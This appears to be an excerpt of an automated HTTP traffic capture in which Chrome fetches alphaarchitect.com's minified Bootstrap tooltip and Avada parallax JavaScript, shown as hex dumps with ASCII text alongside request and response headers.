                                                                                                                                                                                                                                                                        2024-12-20 12:44:59 UTC1369INData Raw: 20 69 3d 74 2e 63 6f 6e 74 61 69 6e 73 28 74 68 69 73 2e 24 65 6c 65 6d 65 6e 74 5b 30 5d 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2c 74 68 69 73 2e 24 65 6c 65 6d 65 6e 74 5b 30 5d 29 3b 69 66 28 65 2e 69 73 44 65 66 61 75 6c 74 50 72 65 76 65 6e 74 65 64 28 29 7c 7c 21 69 29 72 65 74 75 72 6e 3b 76 61 72 20 6f 3d 74 68 69 73 2c 6e 3d 74 68 69 73 2e 74 69 70 28 29 2c 73 3d 74 68 69 73 2e 67 65 74 55 49 44 28 74 68 69 73 2e 74 79 70 65 29 3b 74 68 69 73 2e 73 65 74 43 6f 6e 74 65 6e 74 28 29 2c 6e 2e 61 74 74 72 28 22 69 64 22 2c 73 29 2c 74 68 69 73 2e 24 65 6c 65 6d 65 6e 74 2e 61 74 74 72 28 22 61 72 69 61 2d 64 65 73 63 72 69 62 65 64 62 79 22 2c 73 29 2c 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 61 6e 69
                                                                                                                                                                                                                                                                        Data Ascii: i=t.contains(this.$element[0].ownerDocument.documentElement,this.$element[0]);if(e.isDefaultPrevented()||!i)return;var o=this,n=this.tip(),s=this.getUID(this.type);this.setContent(),n.attr("id",s),this.$element.attr("aria-describedby",s),this.options.ani
                                                                                                                                                                                                                                                                        2024-12-20 12:44:59 UTC1369INData Raw: 75 6e 63 74 69 6f 6e 28 65 2c 69 29 7b 76 61 72 20 6f 3d 74 68 69 73 2e 74 69 70 28 29 2c 6e 3d 6f 5b 30 5d 2e 6f 66 66 73 65 74 57 69 64 74 68 2c 73 3d 6f 5b 30 5d 2e 6f 66 66 73 65 74 48 65 69 67 68 74 2c 72 3d 70 61 72 73 65 49 6e 74 28 6f 2e 63 73 73 28 22 6d 61 72 67 69 6e 2d 74 6f 70 22 29 2c 31 30 29 2c 61 3d 70 61 72 73 65 49 6e 74 28 6f 2e 63 73 73 28 22 6d 61 72 67 69 6e 2d 6c 65 66 74 22 29 2c 31 30 29 3b 69 73 4e 61 4e 28 72 29 26 26 28 72 3d 30 29 2c 69 73 4e 61 4e 28 61 29 26 26 28 61 3d 30 29 2c 65 2e 74 6f 70 2b 3d 72 2c 65 2e 6c 65 66 74 2b 3d 61 2c 74 2e 6f 66 66 73 65 74 2e 73 65 74 4f 66 66 73 65 74 28 6f 5b 30 5d 2c 74 2e 65 78 74 65 6e 64 28 7b 75 73 69 6e 67 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 6f 2e 63 73 73 28 7b 74 6f 70 3a 4d
                                                                                                                                                                                                                                                                        Data Ascii: unction(e,i){var o=this.tip(),n=o[0].offsetWidth,s=o[0].offsetHeight,r=parseInt(o.css("margin-top"),10),a=parseInt(o.css("margin-left"),10);isNaN(r)&&(r=0),isNaN(a)&&(a=0),e.top+=r,e.left+=a,t.offset.setOffset(o[0],t.extend({using:function(t){o.css({top:M
                                                                                                                                                                                                                                                                        2024-12-20 12:44:59 UTC1369INData Raw: 74 65 54 72 61 6e 73 69 74 69 6f 6e 45 6e 64 28 6c 2e 54 52 41 4e 53 49 54 49 4f 4e 5f 44 55 52 41 54 49 4f 4e 29 3a 73 28 29 2c 74 68 69 73 2e 68 6f 76 65 72 53 74 61 74 65 3d 6e 75 6c 6c 2c 74 68 69 73 7d 2c 6c 2e 70 72 6f 74 6f 74 79 70 65 2e 66 69 78 54 69 74 6c 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 74 68 69 73 2e 24 65 6c 65 6d 65 6e 74 3b 28 74 2e 61 74 74 72 28 22 74 69 74 6c 65 22 29 7c 7c 22 73 74 72 69 6e 67 22 21 3d 74 79 70 65 6f 66 20 74 2e 61 74 74 72 28 22 64 61 74 61 2d 6f 72 69 67 69 6e 61 6c 2d 74 69 74 6c 65 22 29 29 26 26 74 2e 61 74 74 72 28 22 64 61 74 61 2d 6f 72 69 67 69 6e 61 6c 2d 74 69 74 6c 65 22 2c 74 2e 61 74 74 72 28 22 74 69 74 6c 65 22 29 7c 7c 22 22 29 2e 61 74 74 72 28 22 74 69 74 6c 65 22 2c 22 22 29
                                                                                                                                                                                                                                                                        Data Ascii: teTransitionEnd(l.TRANSITION_DURATION):s(),this.hoverState=null,this},l.prototype.fixTitle=function(){var t=this.$element;(t.attr("title")||"string"!=typeof t.attr("data-original-title"))&&t.attr("data-original-title",t.attr("title")||"").attr("title","")
                                                                                                                                                                                                                                                                        2024-12-20 12:44:59 UTC1369INData Raw: 65 66 74 2d 70 3a 68 3e 72 2e 72 69 67 68 74 26 26 28 6e 2e 6c 65 66 74 3d 72 2e 6c 65 66 74 2b 72 2e 77 69 64 74 68 2d 68 29 7d 72 65 74 75 72 6e 20 6e 7d 2c 6c 2e 70 72 6f 74 6f 74 79 70 65 2e 67 65 74 54 69 74 6c 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 74 68 69 73 2e 24 65 6c 65 6d 65 6e 74 2c 65 3d 74 68 69 73 2e 6f 70 74 69 6f 6e 73 3b 72 65 74 75 72 6e 20 74 2e 61 74 74 72 28 22 64 61 74 61 2d 6f 72 69 67 69 6e 61 6c 2d 74 69 74 6c 65 22 29 7c 7c 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 65 2e 74 69 74 6c 65 3f 65 2e 74 69 74 6c 65 2e 63 61 6c 6c 28 74 5b 30 5d 29 3a 65 2e 74 69 74 6c 65 29 7d 2c 6c 2e 70 72 6f 74 6f 74 79 70 65 2e 67 65 74 55 49 44 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 64 6f 7b 74 2b 3d 7e 7e 28
                                                                                                                                                                                                                                                                        Data Ascii: eft-p:h>r.right&&(n.left=r.left+r.width-h)}return n},l.prototype.getTitle=function(){var t=this.$element,e=this.options;return t.attr("data-original-title")||("function"==typeof e.title?e.title.call(t[0]):e.title)},l.prototype.getUID=function(t){do{t+=~~(
                                                                                                                                                                                                                                                                        2024-12-20 12:44:59 UTC409INData Raw: 74 2c 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 77 68 69 74 65 4c 69 73 74 2c 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 73 61 6e 69 74 69 7a 65 46 6e 29 7d 3b 76 61 72 20 70 3d 74 2e 66 6e 2e 74 6f 6f 6c 74 69 70 3b 74 2e 66 6e 2e 74 6f 6f 6c 74 69 70 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 69 3d 74 28 74 68 69 73 29 2c 6f 3d 69 2e 64 61 74 61 28 22 62 73 2e 74 6f 6f 6c 74 69 70 22 29 2c 6e 3d 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 26 26 65 3b 21 6f 26 26 2f 64 65 73 74 72 6f 79 7c 68 69 64 65 2f 2e 74 65 73 74 28 65 29 7c 7c 28 6f 7c 7c 69 2e 64 61 74 61 28 22 62 73 2e 74 6f 6f 6c 74 69 70 22 2c 6f 3d 6e 65 77 20 6c 28 74 68 69 73 2c 6e 29 29 2c 22 73
                                                                                                                                                                                                                                                                        Data Ascii: t,this.options.whiteList,this.options.sanitizeFn)};var p=t.fn.tooltip;t.fn.tooltip=function(e){return this.each(function(){var i=t(this),o=i.data("bs.tooltip"),n="object"==typeof e&&e;!o&&/destroy|hide/.test(e)||(o||i.data("bs.tooltip",o=new l(this,n)),"s
                                                                                                                                                                                                                                                                        2024-12-20 12:44:59 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        102192.168.2.449860141.193.213.104435808C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-20 12:44:58 UTC838OUTGET /wp-content/cache/min/1/wp-content/themes/Avada/includes/lib/assets/min/js/library/fusion-parallax.js?ver=1733842125 HTTP/1.1
                                                                                                                                                                                                                                                                        Host: alphaarchitect.com
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                        Referer: https://alphaarchitect.com/2024/12/long-term-expected-returns/
                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                        Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
                                                                                                                                                                                                                                                                        2024-12-20 12:44:59 UTC492INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Fri, 20 Dec 2024 12:44:58 GMT
                                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Last-Modified: Tue, 10 Dec 2024 14:48:45 GMT
                                                                                                                                                                                                                                                                        ETag: W/"675854cd-3524"
                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                        Age: 147815
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f4fba146b4643e2-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        2024-12-20 12:44:59 UTC877INData Raw: 33 35 32 34 0d 0a 66 75 6e 63 74 69 6f 6e 20 5f 66 75 73 69 6f 6e 52 65 66 72 65 73 68 53 63 72 6f 6c 6c 28 29 7b 77 69 6e 64 6f 77 2e 5f 66 75 73 69 6f 6e 53 63 72 6f 6c 6c 54 6f 70 3d 77 69 6e 64 6f 77 2e 70 61 67 65 59 4f 66 66 73 65 74 2c 77 69 6e 64 6f 77 2e 5f 66 75 73 69 6f 6e 53 63 72 6f 6c 6c 4c 65 66 74 3d 77 69 6e 64 6f 77 2e 70 61 67 65 58 4f 66 66 73 65 74 7d 66 75 6e 63 74 69 6f 6e 20 5f 66 75 73 69 6f 6e 50 61 72 61 6c 6c 61 78 41 6c 6c 28 29 7b 76 61 72 20 74 3b 66 6f 72 28 5f 66 75 73 69 6f 6e 52 65 66 72 65 73 68 53 63 72 6f 6c 6c 28 29 2c 74 3d 30 3b 74 3c 77 69 6e 64 6f 77 2e 5f 66 75 73 69 6f 6e 49 6d 61 67 65 50 61 72 61 6c 6c 61 78 49 6d 61 67 65 73 2e 6c 65 6e 67 74 68 3b 74 2b 2b 29 77 69 6e 64 6f 77 2e 5f 66 75 73 69 6f 6e 49 6d
                                                                                                                                                                                                                                                                        Data Ascii: 3524function _fusionRefreshScroll(){window._fusionScrollTop=window.pageYOffset,window._fusionScrollLeft=window.pageXOffset}function _fusionParallaxAll(){var t;for(_fusionRefreshScroll(),t=0;t<window._fusionImageParallaxImages.length;t++)window._fusionIm
                                                                                                                                                                                                                                                                        2024-12-20 12:44:59 UTC1369INData Raw: 63 65 6c 41 6e 69 6d 61 74 69 6f 6e 46 72 61 6d 65 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 63 6c 65 61 72 54 69 6d 65 6f 75 74 28 74 29 7d 29 2c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 2e 72 65 71 75 65 73 74 41 6e 69 6d 61 74 69 6f 6e 46 72 61 6d 65 7d 29 7d 28 77 69 6e 64 6f 77 29 2c 76 6f 69 64 20 30 3d 3d 3d 77 69 6e 64 6f 77 2e 5f 66 75 73 69 6f 6e 49 6d 61 67 65 50 61 72 61 6c 6c 61 78 49 6d 61 67 65 73 26 26 28 77 69 6e 64 6f 77 2e 5f 66 75 73 69 6f 6e 49 6d 61 67 65 50 61 72 61 6c 6c 61 78 49 6d 61 67 65 73 3d 5b 5d 29 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 69 29 7b 76 61 72 20 65 3d 22 66 75 73 69 6f 6e 49 6d 61 67 65 50 61 72 61 6c
                                                                                                                                                                                                                                                                        Data Ascii: celAnimationFrame=function(t){clearTimeout(t)}),"function"==typeof define&&define(function(){return t.requestAnimationFrame})}(window),void 0===window._fusionImageParallaxImages&&(window._fusionImageParallaxImages=[]),function(t,i){var e="fusionImageParal
                                                                                                                                                                                                                                                                        2024-12-20 12:44:59 UTC1369INData Raw: 28 74 68 69 73 29 2c 6a 51 75 65 72 79 28 74 68 69 73 2e 65 6c 65 6d 65 6e 74 29 2e 61 74 74 72 28 22 64 61 74 61 2d 70 61 72 61 6c 6c 61 78 2d 69 6e 64 65 78 22 2c 65 2d 31 29 2c 74 68 69 73 2e 73 65 74 75 70 28 29 2c 74 68 69 73 2e 73 65 74 74 69 6e 67 73 2e 63 6f 6d 70 6c 65 74 65 28 29 2c 74 68 69 73 2e 63 6f 6e 74 61 69 6e 65 72 57 69 64 74 68 3d 30 2c 74 68 69 73 2e 63 6f 6e 74 61 69 6e 65 72 48 65 69 67 68 74 3d 30 7d 2c 73 65 74 75 70 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 21 31 21 3d 3d 74 68 69 73 2e 73 65 74 74 69 6e 67 73 2e 72 65 6d 6f 76 65 4f 72 69 67 26 26 74 28 74 68 69 73 2e 65 6c 65 6d 65 6e 74 29 2e 72 65 6d 6f 76 65 28 29 2c 74 68 69 73 2e 72 65 73 69 7a 65 50 61 72 61 6c 6c 61 78 42 61 63 6b 67 72 6f 75 6e 64 28 29 7d 2c 64 6f 50 61 72
                                                                                                                                                                                                                                                                        Data Ascii: (this),jQuery(this.element).attr("data-parallax-index",e-1),this.setup(),this.settings.complete(),this.containerWidth=0,this.containerHeight=0},setup:function(){!1!==this.settings.removeOrig&&t(this.element).remove(),this.resizeParallaxBackground()},doPar
                                                                                                                                                                                                                                                                        2024-12-20 12:44:59 UTC1369INData Raw: 73 28 22 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 22 29 26 26 28 22 64 6f 77 6e 22 3d 3d 3d 74 68 69 73 2e 73 65 74 74 69 6e 67 73 2e 64 69 72 65 63 74 69 6f 6e 26 26 30 3e 61 3f 61 3d 30 3a 22 75 70 22 3d 3d 3d 74 68 69 73 2e 73 65 74 74 69 6e 67 73 2e 64 69 72 65 63 74 69 6f 6e 26 26 30 3c 61 3f 61 3d 30 3a 22 72 69 67 68 74 22 3d 3d 3d 74 68 69 73 2e 73 65 74 74 69 6e 67 73 2e 64 69 72 65 63 74 69 6f 6e 26 26 30 3e 61 3f 61 3d 30 3a 22 6c 65 66 74 22 3d 3d 3d 74 68 69 73 2e 73 65 74 74 69 6e 67 73 2e 64 69 72 65 63 74 69 6f 6e 26 26 30 3c 61 26 26 28 61 3d 30 29 29 2c 22 66 69 78 65 64 22 3d 3d 3d 74 68 69 73 2e 73 65 74 74 69 6e 67 73 2e 64 69 72 65 63 74 69 6f 6e 7c 7c 28 22 6c 65 66 74 22 3d 3d 3d 74 68 69 73 2e 73 65 74 74 69 6e 67 73 2e
                                                                                                                                                                                                                                                                        Data Ascii: s("background-repeat")&&("down"===this.settings.direction&&0>a?a=0:"up"===this.settings.direction&&0<a?a=0:"right"===this.settings.direction&&0>a?a=0:"left"===this.settings.direction&&0<a&&(a=0)),"fixed"===this.settings.direction||("left"===this.settings.
                                                                                                                                                                                                                                                                        2024-12-20 12:44:59 UTC1369INData Raw: 62 6c 65 6e 64 4d 6f 64 65 53 6d 61 6c 6c 26 26 4d 6f 64 65 72 6e 69 7a 72 2e 6d 71 28 22 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 20 22 2b 66 75 73 69 6f 6e 4a 53 56 61 72 73 2e 76 69 73 69 62 69 6c 69 74 79 5f 73 6d 61 6c 6c 2b 22 70 78 29 22 29 26 26 28 65 3d 74 68 69 73 2e 73 65 74 74 69 6e 67 73 2e 62 6c 65 6e 64 4d 6f 64 65 53 6d 61 6c 6c 29 2c 74 2e 66 69 6e 64 28 22 2e 70 61 72 61 6c 6c 61 78 2d 69 6e 6e 65 72 22 29 2e 63 73 73 28 7b 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 22 3a 73 2c 22 62 61 63 6b 67 72 6f 75 6e 64 2d 62 6c 65 6e 64 2d 6d 6f 64 65 22 3a 65 7d 29 2c 22 22 21 3d 3d 69 26 26 74 2e 66 69 6e 64 28 22 2e 70 61 72 61 6c 6c 61 78 2d 69 6e 6e 65 72 22 29 2e 63 73 73 28 7b 22 62 61 63 6b
                                                                                                                                                                                                                                                                        Data Ascii: blendModeSmall&&Modernizr.mq("only screen and (max-width: "+fusionJSVars.visibility_small+"px)")&&(e=this.settings.blendModeSmall),t.find(".parallax-inner").css({"background-color":s,"background-blend-mode":e}),""!==i&&t.find(".parallax-inner").css({"back
                                                                                                                                                                                                                                                                        2024-12-20 12:44:59 UTC1369INData Raw: 6f 74 74 6f 6d 22 3d 3d 3d 74 68 69 73 2e 73 65 74 74 69 6e 67 73 2e 61 6c 69 67 6e 26 26 28 61 3d 22 35 30 25 20 31 30 30 25 22 29 2c 63 2e 63 73 73 28 7b 6f 70 61 63 69 74 79 3a 4d 61 74 68 2e 61 62 73 28 70 61 72 73 65 46 6c 6f 61 74 28 74 68 69 73 2e 73 65 74 74 69 6e 67 73 2e 6f 70 61 63 69 74 79 29 2f 31 30 30 29 2c 62 61 63 6b 67 72 6f 75 6e 64 53 69 7a 65 3a 22 63 6f 76 65 72 22 2c 62 61 63 6b 67 72 6f 75 6e 64 41 74 74 61 63 68 6d 65 6e 74 3a 22 73 63 72 6f 6c 6c 22 2c 62 61 63 6b 67 72 6f 75 6e 64 50 6f 73 69 74 69 6f 6e 3a 61 2c 62 61 63 6b 67 72 6f 75 6e 64 52 65 70 65 61 74 3a 22 6e 6f 2d 72 65 70 65 61 74 22 7d 29 2c 22 22 21 3d 3d 74 68 69 73 2e 73 65 74 74 69 6e 67 73 2e 69 6d 61 67 65 26 26 22 6e 6f 6e 65 22 21 3d 3d 74 68 69 73 2e 73 65
                                                                                                                                                                                                                                                                        Data Ascii: ottom"===this.settings.align&&(a="50% 100%"),c.css({opacity:Math.abs(parseFloat(this.settings.opacity)/100),backgroundSize:"cover",backgroundAttachment:"scroll",backgroundPosition:a,backgroundRepeat:"no-repeat"}),""!==this.settings.image&&"none"!==this.se
                                                                                                                                                                                                                                                                        2024-12-20 12:44:59 UTC1369INData Raw: 73 65 74 74 69 6e 67 73 2e 78 70 6f 73 2b 22 20 22 2b 74 68 69 73 2e 73 65 74 74 69 6e 67 73 2e 79 70 6f 73 2c 62 61 63 6b 67 72 6f 75 6e 64 52 65 70 65 61 74 3a 74 3f 22 72 65 70 65 61 74 22 3a 22 6e 6f 2d 72 65 70 65 61 74 22 2c 62 61 63 6b 67 72 6f 75 6e 64 53 69 7a 65 3a 74 3f 22 61 75 74 6f 22 3a 22 63 6f 76 65 72 22 7d 29 2c 22 22 21 3d 3d 74 68 69 73 2e 73 65 74 74 69 6e 67 73 2e 69 6d 61 67 65 26 26 22 6e 6f 6e 65 22 21 3d 3d 74 68 69 73 2e 73 65 74 74 69 6e 67 73 2e 69 6d 61 67 65 26 26 28 63 2e 66 69 6e 64 28 22 2e 70 61 72 61 6c 6c 61 78 2d 69 6e 6e 65 72 22 29 2e 63 73 73 28 7b 6f 70 61 63 69 74 79 3a 4d 61 74 68 2e 61 62 73 28 70 61 72 73 65 46 6c 6f 61 74 28 74 68 69 73 2e 73 65 74 74 69 6e 67 73 2e 6f 70 61 63 69 74 79 29 2f 31 30 30 29 2c
                                                                                                                                                                                                                                                                        Data Ascii: settings.xpos+" "+this.settings.ypos,backgroundRepeat:t?"repeat":"no-repeat",backgroundSize:t?"auto":"cover"}),""!==this.settings.image&&"none"!==this.settings.image&&(c.find(".parallax-inner").css({opacity:Math.abs(parseFloat(this.settings.opacity)/100),
                                                                                                                                                                                                                                                                        2024-12-20 12:44:59 UTC1369INData Raw: 65 72 22 7d 29 2c 22 22 21 3d 3d 74 68 69 73 2e 73 65 74 74 69 6e 67 73 2e 69 6d 61 67 65 26 26 22 6e 6f 6e 65 22 21 3d 3d 74 68 69 73 2e 73 65 74 74 69 6e 67 73 2e 69 6d 61 67 65 26 26 28 63 2e 66 69 6e 64 28 22 2e 70 61 72 61 6c 6c 61 78 2d 69 6e 6e 65 72 22 29 2e 63 73 73 28 7b 6f 70 61 63 69 74 79 3a 4d 61 74 68 2e 61 62 73 28 70 61 72 73 65 46 6c 6f 61 74 28 74 68 69 73 2e 73 65 74 74 69 6e 67 73 2e 6f 70 61 63 69 74 79 29 2f 31 30 30 29 2c 62 61 63 6b 67 72 6f 75 6e 64 49 6d 61 67 65 3a 75 3f 22 22 3a 22 75 72 6c 28 22 2b 74 68 69 73 2e 73 65 74 74 69 6e 67 73 2e 69 6d 61 67 65 2b 22 29 22 7d 29 2c 74 68 69 73 2e 73 65 74 42 61 63 6b 67 72 6f 75 6e 64 53 74 79 6c 69 6e 67 28 63 2c 6d 29 29 2c 64 3d 30 2c 63 2e 6f 66 66 73 65 74 28 29 2e 74 6f 70 3e
                                                                                                                                                                                                                                                                        Data Ascii: er"}),""!==this.settings.image&&"none"!==this.settings.image&&(c.find(".parallax-inner").css({opacity:Math.abs(parseFloat(this.settings.opacity)/100),backgroundImage:u?"":"url("+this.settings.image+")"}),this.setBackgroundStyling(c,m)),d=0,c.offset().top>
                                                                                                                                                                                                                                                                        2024-12-20 12:44:59 UTC1369INData Raw: 6d 61 67 65 73 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 69 29 7b 69 2e 72 65 73 69 7a 65 50 61 72 61 6c 6c 61 78 42 61 63 6b 67 72 6f 75 6e 64 28 29 7d 29 7d 2c 31 29 2c 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 5f 66 75 73 69 6f 6e 52 65 66 72 65 73 68 57 69 6e 64 6f 77 28 29 2c 6a 51 75 65 72 79 2e 65 61 63 68 28 77 69 6e 64 6f 77 2e 5f 66 75 73 69 6f 6e 49 6d 61 67 65 50 61 72 61 6c 6c 61 78 49 6d 61 67 65 73 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 69 29 7b 69 2e 72 65 73 69 7a 65 50 61 72 61 6c 6c 61 78 42 61 63 6b 67 72 6f 75 6e 64 28 29 7d 29 7d 2c 31 30 30 29 2c 6a 51 75 65 72 79 2e 65 61 63 68 28 77 69 6e 64 6f 77 2e 5f 66 75 73 69 6f 6e 49 6d 61 67 65 50 61 72 61 6c 6c 61 78 49 6d 61 67 65 73 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 69
                                                                                                                                                                                                                                                                        Data Ascii: mages,function(t,i){i.resizeParallaxBackground()})},1),setTimeout(function(){_fusionRefreshWindow(),jQuery.each(window._fusionImageParallaxImages,function(t,i){i.resizeParallaxBackground()})},100),jQuery.each(window._fusionImageParallaxImages,function(t,i
                                                                                                                                                                                                                                                                        2024-12-20 12:44:59 UTC1369INData Raw: 75 65 72 79 28 74 68 69 73 29 2e 64 61 74 61 28 22 62 67 2d 63 6f 6c 6f 72 22 29 3a 22 22 2c 62 61 63 6b 67 72 6f 75 6e 64 43 6f 6c 6f 72 4d 65 64 69 75 6d 3a 76 6f 69 64 20 30 21 3d 3d 6a 51 75 65 72 79 28 74 68 69 73 29 2e 64 61 74 61 28 22 62 67 2d 63 6f 6c 6f 72 2d 6d 65 64 69 75 6d 22 29 3f 6a 51 75 65 72 79 28 74 68 69 73 29 2e 64 61 74 61 28 22 62 67 2d 63 6f 6c 6f 72 2d 6d 65 64 69 75 6d 22 29 3a 22 22 2c 62 61 63 6b 67 72 6f 75 6e 64 43 6f 6c 6f 72 53 6d 61 6c 6c 3a 76 6f 69 64 20 30 21 3d 3d 6a 51 75 65 72 79 28 74 68 69 73 29 2e 64 61 74 61 28 22 62 67 2d 63 6f 6c 6f 72 2d 73 6d 61 6c 6c 22 29 3f 6a 51 75 65 72 79 28 74 68 69 73 29 2e 64 61 74 61 28 22 62 67 2d 63 6f 6c 6f 72 2d 73 6d 61 6c 6c 22 29 3a 22 22 2c 62 6c 65 6e 64 4d 6f 64 65 3a 76
                                                                                                                                                                                                                                                                        Data Ascii: uery(this).data("bg-color"):"",backgroundColorMedium:void 0!==jQuery(this).data("bg-color-medium")?jQuery(this).data("bg-color-medium"):"",backgroundColorSmall:void 0!==jQuery(this).data("bg-color-small")?jQuery(this).data("bg-color-small"):"",blendMode:v


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        103192.168.2.449861141.193.213.114435808C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-20 12:44:58 UTC614OUTGET /wp-content/cache/min/1/wp-content/plugins/mc4wp-premium/ajax-forms/assets/js/ajax-forms.js?ver=1733842125 HTTP/1.1
                                                                                                                                                                                                                                                                        Host: alphaarchitect.com
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                        Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
                                                                                                                                                                                                                                                                        2024-12-20 12:44:59 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Fri, 20 Dec 2024 12:44:58 GMT
                                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Last-Modified: Tue, 10 Dec 2024 14:48:45 GMT
                                                                                                                                                                                                                                                                        ETag: W/"675854cd-cbc"
                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                        Age: 147815
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f4fba146b4741f3-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
